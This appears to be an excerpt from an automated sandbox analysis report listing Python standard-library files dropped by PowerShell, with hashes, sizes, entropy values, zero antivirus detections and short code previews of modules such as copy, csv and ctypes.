                                                                                                    SHA-256:758A96E17249E1E97C5CA5D1EE39AA31E5D439D0922AE7AF0064318E70B59FC8
                                                                                                    SHA-512:187E365C0237144C2C3827305B8BB678BFE5161A4AC4AC0E115F78C199DE3D18438FA124CF4303A9175F82FBE8E45057A733337B35ED8B20F9575A18B066A8DC
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:from _contextvars import Context, ContextVar, Token, copy_context......__all__ = ('Context', 'ContextVar', 'Token', 'copy_context')..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8704
                                                                                                    Entropy (8bit):4.387327877038775
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Ve6OGrNnrF8C7ar5RlONoJTjIkWJYbOqmwKNgm0qu0JQZGWGy5:46OGrNnrFniv5JTPlm0T
                                                                                                    MD5:815C3604F39E2CA5300D634E6BB4680A
                                                                                                    SHA1:8152E8EA9928CC03A253FC6D519C2DD3F93A74EC
                                                                                                    SHA-256:4A28A8FAE74106D128DDEED0B59EF38DEAB2F7B8B9D3BD006130C3CF75B42D34
                                                                                                    SHA-512:F65B1BED4A4D7C42F49A55551610F2ADF1EAAFBD43116062FFBDF907D894918BDEDF2FFAC39CB6642A43FEFD70C86C3E7BA3C9BA4C0F94CC0E0F1104F31C7B39
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Generic (shallow and deep) copying operations.....Interface summary:.... import copy.... x = copy.copy(y) # make a shallow copy of y.. x = copy.deepcopy(y) # make a deep copy of y....For module specific errors, copy.Error is raised.....The difference between shallow and deep copying is only relevant for..compound objects (objects that contain other objects, like lists or..class instances).....- A shallow copy constructs a new compound object and then (to the.. extent possible) inserts *the same objects* into it that the.. original contains.....- A deep copy constructs a new compound object and then, recursively,.. inserts *copies* into it of the objects found in the original.....Two problems often exist with deep copy operations that don't exist..with shallow copy operations:.... a) recursive objects (compound objects that, directly or indirectly,.. contain a reference to themselves) may cause a recursive loop.... b) because deep copy copies *eve
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7831
                                                                                                    Entropy (8bit):4.481796603887747
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:i0YOWh6R+k2vypRXb+7xV+0Xi+xCgGoqn4zs3ftHvpRDkT3LHQXTNS/DK:i7D6o/aDAxV+2UzoWI+fxxRyAS/DK
                                                                                                    MD5:5EB8600498B0076C779DF8E9967CC987
                                                                                                    SHA1:6AE4D522FD0E15A40553BE46FB0080CF837A2D40
                                                                                                    SHA-256:EA2363638FE83E8E5B007013A821841371A615D99414B3C2F8F19152CA109A07
                                                                                                    SHA-512:FAA410A313CE8A1E2427FB5AE8AA272689E71AE8C3F9C81E95820ED2B267BB79D7749754BEF05C24E702BC80BB288B77A14F6711C016DF405511822713EEE8C6
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Helper to provide extensibility for pickle.....This is only useful to add pickle support for extension types defined in..C, not for instances of user-defined classes..."""....__all__ = ["pickle", "constructor",.. "add_extension", "remove_extension", "clear_extension_cache"]....dispatch_table = {}....def pickle(ob_type, pickle_function, constructor_ob=None):.. if not callable(pickle_function):.. raise TypeError("reduction functions must be callable").. dispatch_table[ob_type] = pickle_function.... # The constructor_ob function is a vestige of safe for unpickling... # There is no reason for the caller to pass it anymore... if constructor_ob is not None:.. constructor(constructor_ob)....def constructor(object):.. if not callable(object):.. raise TypeError("constructors must be callable")....# Example: provide pickling support for complex numbers.....def pickle_complex(c):.. return complex, (c.real, c.imag)....pickle(complex, pickle_co
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4037
                                                                                                    Entropy (8bit):4.832971821964293
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dIqV/Rq6HYaRBfmqj0vAhdjFRIJSXt/yOTHXQ:hFlfmo0cjFR8ot/yOjQ
                                                                                                    MD5:58B893ED030C23C92F937769B3B9B8AF
                                                                                                    SHA1:CC3A86B29E3227943CEB643987B8B1215A6F31A5
                                                                                                    SHA-256:0FE812BD7DD51D8424590F08F0F74D36EA8C35D26110F5BA6172EC67DFF6E9E0
                                                                                                    SHA-512:9E9BC793AEFEFF4A5DD55A0E3F356DC9194551E85BE6ACF033E4FFD9CA37718FD5F040C6141A8C26A8BDDFA5104517058F90ABD47BAB4003E72C74342775AA4D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Wrapper to the POSIX crypt library call and associated functionality."""....import sys as _sys....try:.. import _crypt..except ModuleNotFoundError:.. if _sys.platform == 'win32':.. raise ImportError("The crypt module is not supported on Windows").. else:.. raise ImportError("The required _crypt module was not built as part of CPython")....import errno..import string as _string..import warnings..from random import SystemRandom as _SystemRandom..from collections import namedtuple as _namedtuple......warnings._deprecated(__name__, remove=(3, 13))......_saltchars = _string.ascii_letters + _string.digits + './'.._sr = _SystemRandom()......class _Method(_namedtuple('_Method', 'name ident salt_chars total_size')):.... """Class representing a salt method per the Modular Crypt Format or the.. legacy 2-character crypt method.""".... def __repr__(self):.. return '<crypt.METHOD_{}>'.format(self.name)......def mksalt(method=None, *, rounds=None):.. """Ge
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16837
                                                                                                    Entropy (8bit):4.374382068303762
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vJkxIK/P/zv/3I4aU/J4mJQ8cSfyuuxIQErDFYCiFBwbxZYwUu/6TTNMnzFcIO/G:vJaX3pzbM4rDiBwnC/acbsr
                                                                                                    MD5:357ECA4DF52D3496E6A84679FB379084
                                                                                                    SHA1:DBCD14E660E51F23E77BDF6767112B14C954E77C
                                                                                                    SHA-256:8486CB388FE0DB87EC3F3330117EE3A9D70FC98BAA82B24A1D369E71E571F018
                                                                                                    SHA-512:9703A60B8D66619E528E43C7AB7F98F166434C3BBD8481B96FCCEB7F97294E99A588D4434830BCFAA59FEA435B81545814DB5AD762853898B41F2155206CCEAA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:.."""..csv.py - read/write/investigate CSV files.."""....import re..import types..from _csv import Error, __version__, writer, reader, register_dialect, \.. unregister_dialect, get_dialect, list_dialects, \.. field_size_limit, \.. QUOTE_MINIMAL, QUOTE_ALL, QUOTE_NONNUMERIC, QUOTE_NONE, \.. QUOTE_STRINGS, QUOTE_NOTNULL, \.. __doc__..from _csv import Dialect as _Dialect....from io import StringIO....__all__ = ["QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",.. "QUOTE_STRINGS", "QUOTE_NOTNULL",.. "Error", "Dialect", "__doc__", "excel", "excel_tab",.. "field_size_limit", "reader", "writer",.. "register_dialect", "get_dialect", "list_dialects", "Sniffer",.. "unregister_dialect", "__version__", "DictReader", "DictWriter",.. "unix_dialect"]....class Dialect:.. """Describe a CSV dialect..... This must be subclassed (see csv.excel). Va
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18761
                                                                                                    Entropy (8bit):4.922522839654682
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:5unNLq2cCplyyFriYYIgH+MKIPpXVege6pGXtS0ynb8055rev9RiRJX+CUgvlWYj:DcljFXgHTKweg0055re7oh+qvlWYj
                                                                                                    MD5:D0859D693B9465BD1FF48DFE865833A3
                                                                                                    SHA1:978C0511EF96D959E0E897D243752BC3A33BA17C
                                                                                                    SHA-256:BB22C1BD20AFD47D33FA6958D8D3E55BEA7A1034DA8EF2D5F5C0BFF1225832C0
                                                                                                    SHA-512:093026A7978122808554ADD8C53A2EAD737CAF125A102B8F66B36E5FD677E4DC31A93025511FCF9D0533AD2491D2753F792B3517B4DB0CFE0206E58A6D0E646C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""create and manipulate C data types in Python"""....import os as _os, sys as _sys..import types as _types....__version__ = "1.1.0"....from _ctypes import Union, Structure, Array..from _ctypes import _Pointer..from _ctypes import CFuncPtr as _CFuncPtr..from _ctypes import __version__ as _ctypes_version..from _ctypes import RTLD_LOCAL, RTLD_GLOBAL..from _ctypes import ArgumentError..from _ctypes import SIZEOF_TIME_T....from struct import calcsize as _calcsize....if __version__ != _ctypes_version:.. raise Exception("Version number mismatch", __version__, _ctypes_version)....if _os.name == "nt":.. from _ctypes import FormatError....DEFAULT_MODE = RTLD_LOCAL..if _os.name == "posix" and _sys.platform == "darwin":.. # On OS X 10.3, we use RTLD_GLOBAL as default mode.. # because RTLD_LOCAL does not work at least on some.. # libraries. OS X 10.3 is Darwin 7, so we check for.. # that..... if int(_os.uname().release.split('.')[0]) < 8:.. DEFAULT_MODE = RTLD_GLOBAL..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23488
                                                                                                    Entropy (8bit):5.346139146330718
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2lGVs/ZHPqa7o0b0/0V+FfgE8cV62nbrkTWTuD8eXJ9mOd/4cXgw:28GZHPX7bA8V+FfgIbwauIQJ3+cXP
                                                                                                    MD5:E2B942B6814A6D1CAD2E720A7B7C1BC6
                                                                                                    SHA1:B1AF27740BA54FF33AD8A788E0BEA405E4053E7B
                                                                                                    SHA-256:2EB5CCBED547F4CB54BD86D1BBDD8A91BDB9F4D7758B09279BA6BCA889EF4D5C
                                                                                                    SHA-512:5A0248BF8670F28D5C727D33E7D1857C91413A86E3420676C0E35D342252BD638485D25CC7C9E1F42A0CF18330C842F5A5EFEB6BC8F1923620B52A99868215C8
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fII........................d.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.k7..r...e.d.e.e...........e.j0..................d.k(..r.d.d.l.m.Z...e.Z.e.j0..................d.k(..rGe.j6..................d.k(..r8..e...e.j:..........................j<..................j?..................d.........d.............d.k...r.e.Z.d.d.l.m Z!m"Z#m$Z%m&Z'..dpd...Z(e(Z)i.Z*d...Z+e.j0..................d.k(..r?d.d.l.m,Z-..d.d.l.m.Z/..i.Z0d...Z1e1j...................r7e+j...................je..................d.d.........e1_.........n.e.j0..................d.k(..r.d.d.l.m3Z-..d.d.l.m4Z4m5Z5m6Z6m7Z7m8Z8..d.d.l.m9Z9m:Z:..d.d.l.m;Z;..dpd...Z<..G.d ..d!e;........Z=..e<e=d"............G.d#..d$e;........Z>..e<e>............G.d%..d&e;........Z?..e<e?............G.d'..d(e;........Z@..e<e@............G.d)..d*e;........ZA..e<eA............e.d+..........e.d,........k(..r.e@ZBeAZCn&..G.d-..d.e;........ZB..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3419
                                                                                                    Entropy (8bit):5.31472116996175
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:jrbQ8VPBJ0tfg45iHSuSaXfuOhtgab/ex9TctRlFpAPir3nWrofP3+l:jrbQ8Vr0/duSiZ1CPA4c3WU3+l
                                                                                                    MD5:0FDA9DC9C51560C5455DDC99B95DCFE8
                                                                                                    SHA1:46794653086D98B8D64EEE575E7A04689BEEA63A
                                                                                                    SHA-256:4BED1C75E896DF05229E609FD827D94A5382E92B158595141B487A70600D5C35
                                                                                                    SHA-512:7C110F406DEAFAD91D00468D23C38CC0E76A189DED1E8D9491DC3692FBEB5887CAD20EE10A0A97B989FDD67529B2FB8B5AD4E183D535DAB1D0F1F254503C83C7
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f5.........................V.....d.d.l.Z.d.d.l.......e.e.........Z.d...Z...G.d...d.........Z...G.d...d.e...e.e.................Z...G.d...d.e...e.e.................Z.e.j...................d.k(..r!d.Z.e.Z...G.d...d.e.e...........Z.e.Z...G.d...d.e.e...........Z.y.e.j...................d.k(..r!d.Z.e.Z...G.d...d.e.e...........Z.e.Z...G.d...d.e.e...........Z.y...e.d...........)......N)...*c...........................t.........|.t.................r.t.........|.t.................S.t.........|.t.................r"t.........|.j...........................|.j...................z...S.t.........|.t.........t.........f.........r.|.S.t.........d.|.z.............).z.Return the type with the 'other' byte order. Simple types like. c_int and so on already have __ctype_be__ and __ctype_le__. attributes which contain the types, for more complicated types. arrays and structures are supported.. z+This type does not support other endian: %s)...hasattr.._OTHER_ENDIAN..getattr..isinstance
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8534
                                                                                                    Entropy (8bit):5.393222042976087
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TU0S9nj00d546IM1nWolOnr4qicqWPfeyGPkPrKadgLaHUaz+tEO9okA9ft:TU0ThM1nhmW2PfeMbZHUaStT9oBb
                                                                                                    MD5:EBA3773F401A0B4CF6A22ED767E84714
                                                                                                    SHA1:960E246FF17E6FBA5687E3AC0D36F8BF6EDA4C7F
                                                                                                    SHA-256:3EA08F1EF5259ACDF43FFE6AE28FE81E9934A4386E0DDAB2346F61138E57100B
                                                                                                    SHA-512:4DCDB4016E94B5F4D0B1540FF4861DF88C05393B12792FEE6B164C8B7DA8B6A13F3F678E3E59B8E5C55550EAF8CD2C57B67ED32FB82D3C999CE92EFDF0EB4497
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f................................d.d.l.Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j"..................Z.e.Z.e.j(..................Z...G.d...d.e.j,..........................Z.e.j...................Z.e.j(..................Z.e.j...................Z.e.j6..................Z.e.j:..................x.Z.Z.e.j@..................x.Z!Z"e.jF..................x.Z$x.Z%Z&e.jF..................x.Z'Z(e.jR..................x.Z*Z+e.jX..................x.Z-Z...e.j^..................e.j(............................e.j^..................e.jX..........................k(..r.e.j...................Z0e.j(..................Z1nQ..e.j^..................e.j:............................e.j^..................e.jX..........................k(..r.e.j@..................Z0e.j:..................Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.jX..................Z8e8Z9e8Z:e8Z;e8Z<e8Z=
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12832
                                                                                                    Entropy (8bit):4.715885314022073
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6u9ZuBRuVbIHqmh3Ahi9Dl9tUTquqCYDS4ZK7TZUzvMsHpHs6NCir99b/wtpvB:6uvu/uJOhwhih9mabUlwvMKHFJn/W7
                                                                                                    MD5:4964E0FCECD0CB9780E294800A063415
                                                                                                    SHA1:ABE3B880D15FDD7453A82BA1986A1A3B1C29F25A
                                                                                                    SHA-256:BCE659C2BF31D4B54C69D2E238DD097392F4108E7970C5E741E415A44D281740
                                                                                                    SHA-512:A7F32ABB9B29995905D37D0685D14F848A4BF84A1FF00F4E6DC125424457A3031398163DA75A86FF191DE9D2444A749E7B5BAD988E0AA2373F33706131E43FF7
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..Lib/ctypes.util.find_library() support for AIX..Similar approach as done for Darwin support by using separate files..but unlike Darwin - no extension such as ctypes.macholib.*....dlopen() is an interface to AIX initAndLoad() - primary documentation at:..https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm..https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm....AIX supports two styles for dlopen(): svr4 (System V Release 4) which is common on posix..platforms, but also a BSD style - aka SVR3.....From AIX 5.3 Difference Addendum (December 2004)..2.9 SVR4 linking affinity..Nowadays, there are two major object file formats used by the operating systems:..XCOFF: The COFF enhanced by IBM and others. The original COFF (Common..Object File Format) was the base of SVR3 and BSD 4.2 systems...ELF: Executable and Linking Format that was developed by AT&T and is a..base for SVR4 UNIX.....While the shared library content
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2613
                                                                                                    Entropy (8bit):4.666359289995818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:kFppFNPBJ5MJKfuf7OUGsH80jw10I478jzQ0o47QDv:kFpHNr5+Z9jw1PCGEVCsv
                                                                                                    MD5:7DAA213263C75057CF125267B7FDFBD3
                                                                                                    SHA1:EFB9403D8E3F09734F6B2BA3889B274997D0A039
                                                                                                    SHA-256:8C5B9AC7306DCF98856C9B815A5FC604BA0F47ACAB15AC47AD858499C6981579
                                                                                                    SHA-512:1E00F043AB8F3F77A81C8C6EA6760625BCDF2ECCBEF6432266F75E89F28778B48BD2709DBCF9D70A4A4E1384629AED31C7FDACDF4723FE18F36B6D9366B03921
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import sys..from ctypes import *...._array_type = type(Array)....def _other_endian(typ):.. """Return the type with the 'other' byte order. Simple types like.. c_int and so on already have __ctype_be__ and __ctype_le__.. attributes which contain the types, for more complicated types.. arrays and structures are supported... """.. # check _OTHER_ENDIAN attribute (present if typ is primitive type).. if hasattr(typ, _OTHER_ENDIAN):.. return getattr(typ, _OTHER_ENDIAN).. # if typ is array.. if isinstance(typ, _array_type):.. return _other_endian(typ._type_) * typ._length_.. # if typ is structure or union.. if issubclass(typ, (Structure, Union)):.. return typ.. raise TypeError("This type does not support other endian: %s" % typ)....class _swapped_meta:.. def __setattr__(self, attrname, value):.. if attrname == "_fields_":.. fields = [].. for desc in value:.. name = desc[0]..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):302
                                                                                                    Entropy (8bit):4.852668847464629
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:8z2wHVpWObNLeQ9exK2kbFYQxEMWLh2jvW/oz2tHRAuyn:8z20hFeOT1DMd2jvb2txa
                                                                                                    MD5:7AD62828A8A0FCA041912A20B451904E
                                                                                                    SHA1:A90A30E3BC7CCC4800DB1A31DC3CDE3B7C4A86FD
                                                                                                    SHA-256:99F3754DEC345ED71E2BCB337E3CDC58B1A4C02D290D870DC20CCDD1FF543AE1
                                                                                                    SHA-512:0E111B5D5282ECE51BA41980D4DE56A38FF7A826173A9D883925968EE71BD664C74436FF319CF4AEF482972BC3689A75AADDE2359C2EEAA91D32B9DA534FCAAD
                                                                                                    Malicious:false
                                                                                                    Preview:Files in this directory come from Bob Ippolito's py2app.....License: Any components of the py2app suite may be distributed under..the MIT or PSF open source licenses.....This is version 1.0, SVN revision 789, from 2006/01/25...The main repository is http://svn.red-bean.com/bob/macholib/trunk/macholib/
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):163
                                                                                                    Entropy (8bit):4.7583014539285395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:IG7yVQV368exRnfNAoWQJpKNdeATVYaFWKOvouRBeofHOtvZLl:IR6V3exRn5WQbceAJYasKOvou3HOV1l
                                                                                                    MD5:B4E0F252AC2C050A15FAE8D8D5153924
                                                                                                    SHA1:B66E8FF57523BDC8E3C1947D84E137B54CEF0E69
                                                                                                    SHA-256:AD449177F69D3150373892859AFF90A1882982E9ABA313B919711B7F38370DEF
                                                                                                    SHA-512:B627C5F8A3E16201F4E223AC30A69BA27D1778B9D28DC6B4CFF900EF8123262FAF4E250796E30BF7CA1CA997AD70F15A59B940E19A4DB675DA3892F2C1FB4BC8
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..Enough Mach-O to make your head spin.....See the relevant header files in /usr/include/mach-o....And also Apple's documentation..."""....__version__ = '1.0'..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5189
                                                                                                    Entropy (8bit):4.901036985693502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:63JF54Kcs5IwOijuELt+hE5zGQ1RK+G9nMexZs0tugAoEwdGfs0tutPScYu5DB7j:4d4KDOl6Vo4pRi9nlXs0sgx8fs0stPSy
                                                                                                    MD5:1BB932CB9991850197F2E64790AE6FE6
                                                                                                    SHA1:478BA77998AF0320658DF4DDF7EAD8CD3E15D8BF
                                                                                                    SHA-256:ED0F3454B06E302EF7393001D638883CE05D471E70550B2AE811D4B169BFEAA1
                                                                                                    SHA-512:D43C08E4C7B3D42A38CD9E77DE59EC11DF205BF105AB565944B6EDE4FE708E0293B2EEC5D15E87C52388E60CE40BA9C3A73EDCB60485057CF59984501BF1345A
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..dyld emulation.."""....import os..from ctypes.macholib.framework import framework_info..from ctypes.macholib.dylib import dylib_info..from itertools import *..try:.. from _ctypes import _dyld_shared_cache_contains_path..except ImportError:.. def _dyld_shared_cache_contains_path(*args):.. raise NotImplementedError....__all__ = [.. 'dyld_find', 'framework_find',.. 'framework_info', 'dylib_info',..]....# These are the defaults as per man dyld(1)..#..DEFAULT_FRAMEWORK_FALLBACK = [.. os.path.expanduser("~/Library/Frameworks"),.. "/Library/Frameworks",.. "/Network/Library/Frameworks",.. "/System/Library/Frameworks",..]....DEFAULT_LIBRARY_FALLBACK = [.. os.path.expanduser("~/lib"),.. "/usr/local/lib",.. "/lib",.. "/usr/lib",..]....def dyld_env(env, var):.. if env is None:.. env = os.environ.. rval = env.get(var).. if rval is None:.. return [].. return rval.split(':')....def dyld_image_suffix(env=None):.. if env is No
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1002
                                                                                                    Entropy (8bit):4.828398959046457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:YVXQSPAb4wdiRaydyrLenQFWLytu9xu/UKS0HKW3:vS4hodWSQY3a/U12KW3
                                                                                                    MD5:890D710C8932B085C7B77B44E18E0321
                                                                                                    SHA1:599CE25EF2A5CF997CDFBB4841284CF11B459D3B
                                                                                                    SHA-256:0F3158FEA8FADBB07B597E05DF93221150CC6EFE21EC1376379EF9EF82DDCD01
                                                                                                    SHA-512:D64AFB135AE91D3E937D2A7EF66C8B2D91B5545C00EF0BA98A2EDD91AF6B400C5768D370768D03AC1245ABD21D5D4819036B189F274C0F8E0BE7659E46612E64
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..Generic dylib path manipulation.."""....import re....__all__ = ['dylib_info']....DYLIB_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+?).. (?:\.(?P<version>[^._]+))?.. (?:_(?P<suffix>[^._]+))?.. \.dylib$..)..""")....def dylib_info(filename):.. """.. A dylib name can take one of the following four forms:.. Location/Name.SomeVersion_Suffix.dylib.. Location/Name.SomeVersion.dylib.. Location/Name_Suffix.dylib.. Location/Name.dylib.... returns None if not found or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.SomeVersion_Suffix.dylib',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present... """.. is_dylib = DYLIB_RE.match(filename).. if not is_dylib:.. return None.. return is_dylib.groupdict()
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:POSIX shell script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86
                                                                                                    Entropy (8bit):4.592685213899164
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:TKH4o8xYdp14T7LtH77RXQ6Iaygn:ho82b2tHRAuygn
                                                                                                    MD5:03FC2CB5CFDE6E1C4A2699CD2193133D
                                                                                                    SHA1:F7FA6A9D1369B55F332E7E21AFE647C2DA05F81B
                                                                                                    SHA-256:7B9EB3A8AF1D12DA22604845995982CA99992876A825F3765E053DDB592620AB
                                                                                                    SHA-512:3CB6955D49468F961896DEDFA7AD51FA608D3E9BA5B88946410DD106827040C34F65DEB0DEBBAA6255E11F1380E11FE08310C4688F9845AFA0141178F848248C
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:#!/bin/sh..svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75
                                                                                                    Entropy (8bit):4.514880857909424
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Sydp14T7LtH77RXQ6Iaygn:tb2tHRAuygn
                                                                                                    MD5:B88DFC5590F1D09D550605F3AFCAC0D7
                                                                                                    SHA1:6724D16CF05434F9B77179D3A340A800EB1AF0DD
                                                                                                    SHA-256:7497FBDBB98AFCA4AC455E3A057C59BCDEBAF1280E25C94741DC301F05CB53E5
                                                                                                    SHA-512:B154B6C65DD7407D412BBC1BB91D73EE6CBEB94AFE21BF46531B82110095F4F58A80B9A6975FF5FE6902116A313FF22FA50BE33429A643D7C35287C0E0BB2BB1
                                                                                                    Malicious:false
                                                                                                    Preview:svn export --force http://svn.red-bean.com/bob/macholib/trunk/macholib/ ...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1147
                                                                                                    Entropy (8bit):4.884155206995322
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:R3AXXQITql4Xhdx8SRy4C0gyFWK9xu/UKHb4WB:RQXAITOwx5A4C0gWHa/Uyb4WB
                                                                                                    MD5:73E5999E096486C2EA108B838F347085
                                                                                                    SHA1:CB25F00F5E97F71C71CFA0F38FF849CD5799C257
                                                                                                    SHA-256:CC5499B69551299EB4CCBD9C5C99260F9D39EB3FD0794BFAF9F727D26D013BD1
                                                                                                    SHA-512:36B454CE3BF879A9A81F353D4FF5773CB4A18B334BB89A7A3FC34DA30EB0413ACAFEB12F5154EB8EE2DDFA0D7BADCD3C9B61D12557362D44AB86B65406CAFD23
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""..Generic framework path manipulation.."""....import re....__all__ = ['framework_info']....STRICT_FRAMEWORK_RE = re.compile(r"""(?x)..(?P<location>^.*)(?:^|/)..(?P<name>.. (?P<shortname>\w+).framework/.. (?:Versions/(?P<version>[^/]+)/)?.. (?P=shortname).. (?:_(?P<suffix>[^_]+))?..)$..""")....def framework_info(filename):.. """.. A framework name can take one of the following four forms:.. Location/Name.framework/Versions/SomeVersion/Name_Suffix.. Location/Name.framework/Versions/SomeVersion/Name.. Location/Name.framework/Name_Suffix.. Location/Name.framework/Name.... returns None if not found, or a mapping equivalent to:.. dict(.. location='Location',.. name='Name.framework/Versions/SomeVersion/Name_Suffix',.. shortname='Name',.. version='SomeVersion',.. suffix='Suffix',.. ).... Note that SomeVersion and Suffix are optional and may be None.. if not present..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14338
                                                                                                    Entropy (8bit):4.328964645531019
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:eJqRMNQWKSUWWziB6NQZi2JspavNCXlkFZ:eoSeWKSUWW2B6Np2Qa1CXlkFZ
